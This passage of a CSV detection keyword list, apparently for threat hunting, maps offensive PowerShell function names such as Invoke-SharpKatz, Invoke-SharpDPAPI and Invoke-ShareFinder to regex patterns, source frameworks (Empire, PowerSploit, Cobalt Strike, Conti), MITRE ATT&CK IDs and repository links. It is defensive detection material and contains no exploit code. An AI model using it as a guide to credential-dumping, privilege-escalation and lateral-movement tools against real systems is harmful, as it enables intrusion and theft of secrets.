"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Service-persistence.ps1*",".{0,1000}Invoke\-Service\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SessionGopher*",".{0,1000}Invoke\-SessionGopher.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-SessionHunter*",".{0,1000}Invoke\-SessionHunter.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-ShadowSpray*",".{0,1000}Invoke\-ShadowSpray.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invoke-sharefinder *",".{0,1000}invoke\-sharefinder\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*invokesharefinder*",".{0,1000}invokesharefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ShareFinder*",".{0,1000}Invoke\-ShareFinder.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-SharpAllowedToAct*",".{0,1000}Invoke\-SharpAllowedToAct.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpBlock*",".{0,1000}Invoke\-SharpBlock.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpBypassUAC*",".{0,1000}Invoke\-SharpBypassUAC.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpChromium*",".{0,1000}Invoke\-SharpChromium.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpClipboard*",".{0,1000}Invoke\-SharpClipboard.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpCloud*",".{0,1000}Invoke\-SharpCloud.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharpcradle*",".{0,1000}Invoke\-Sharpcradle.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpDPAPI*",".{0,1000}Invoke\-SharpDPAPI.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpDump*",".{0,1000}Invoke\-SharpDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharPersist*",".{0,1000}Invoke\-SharPersist.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpGPO*",".{0,1000}Invoke\-SharpGPO.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpGPOAbuse*",".{0,1000}Invoke\-SharpGPOAbuse.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpGPO-RemoteAccessPolicies*",".{0,1000}Invoke\-SharpGPO\-RemoteAccessPolicies.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHandler*",".{0,1000}Invoke\-SharpHandler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHide*",".{0,1000}Invoke\-SharpHide.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*InvokeSharpHound*",".{0,1000}InvokeSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Invoke-Sharphound*",".{0,1000}Invoke\-Sharphound.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Sharphound2*",".{0,1000}Invoke\-Sharphound2.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharphound3*",".{0,1000}Invoke\-Sharphound3.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpHound4*",".{0,1000}Invoke\-SharpHound4.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Sharphound4*",".{0,1000}Invoke\-Sharphound4.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpImpersonation*",".{0,1000}Invoke\-SharpImpersonation.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SharpImpersonationNoSpace*",".{0,1000}Invoke\-SharpImpersonationNoSpace.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SharpKatz*",".{0,1000}Invoke\-SharpKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 